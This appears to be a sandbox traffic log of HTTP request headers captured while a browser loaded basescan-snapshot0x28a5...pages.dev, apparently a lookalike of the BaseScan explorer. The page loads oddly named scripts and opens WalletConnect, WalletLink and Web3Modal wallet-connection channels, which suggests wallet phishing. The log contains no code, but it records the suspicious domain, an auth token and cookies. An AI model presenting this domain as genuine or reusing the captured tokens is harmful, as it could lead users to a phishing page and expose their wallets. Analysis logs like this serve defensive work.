            Source: global trafficHTTP traffic detected: GET /assets/css/theme.min.css?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/css/custom.css?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/fancybox/jquery.fancybox.min.css?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/jquery/dist/jquery.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jss/blockies.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /npm/js-base64@3.7.2/base64.mjs HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jss/qrcode.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/logo-ether.svg?v=0.0.7 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: TZYeXcDa9lNYvDKgUU+hTw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /images/svg/brands/metamask.svg HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/websiteAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /images/logo-symbol.svg HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/main/empty-token.png HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/cons_20.png HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/cexio_20.png HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jss/ace/ace.js HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/93564157-2e8e-4ce7-81df-b264dbee9b00 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWtqZkVuWFNaR2RzR1l3QTN5dmVkUnRRZnpBZ1NEODVjVjRLUHBVNXhqeTcyRSIsInN1YiI6IjVjMzQ3MzE1NDY0OWY4NDFhYjQ0ZjE3N2E0MGM1ZDZmZTY0OWQzYzk2ZDBmZDA5NzM3N2ZhYTE4ZGNiMWI0MWQiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0LmNvbSIsImlhdCI6MTcyNzQ4NjE2MiwiZXhwIjoxNzI3NTcyNTYyfQ.Ke-mXGsyV6xavoL7Shk1MHLzpnu4Dz-9KeNXtj9owYsqLPDdleE7CcrEGiUTrir_-fLvec3xjqMQGI7b_xaFCQ&projectId=9a504add1206ecb902aee52264862b81&ua=wc-2%2Fjs-2.10.2%2Fwindows10-chrome-117.0.0%2Fbrowser%3Abasescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev&useOnCloseEvent=true HTTP/1.1Host: relay.walletconnect.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: F3My92LcU7wBXCIxlJ5D5g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /d3d3/ZGVsaXZlcnk/YXN5bmNqcw==.php HTTP/1.1Host: eas.etherscan.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/metawin_20.png HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/svg/brands/walletconnect.svg HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/websiteAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /v1/scripts/hp-sdk.js?v=0 HTTP/1.1Host: api.hypelab.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/stake-4_20.png HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/bcgame_20c.png HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/gen/bcgame_20a.png HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/06b26297-fe0c-4733-5d6b-ffa5498aac00 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /getWallets?page=1&entries=4 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/ab9c186a-c52f-464b-2906-ca59d760a400 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/41d04d42-da3b-4453-8506-668cc0727900 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/600a9a04-c1b9-42ca-6785-9b4b6ff85200 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /public/getAssetImage/7289c336-3981-4081-c5f4-efc26ac64a00 HTTP/1.1Host: api.web3modal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-sdk-version: html-ethers5-3.2.1x-sdk-type: w3msec-ch-ua-mobile: ?0x-project-id: 9a504add1206ecb902aee52264862b81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/svg/brands/coinbase.svg HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/websiteAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/vendor/jquery-ui/jquery-ui.min.js?v=24.4.4.9 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/vendor/font-awesome/webfonts/fa-solid-900.woff2 HTTP/1.1Host: basescan.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
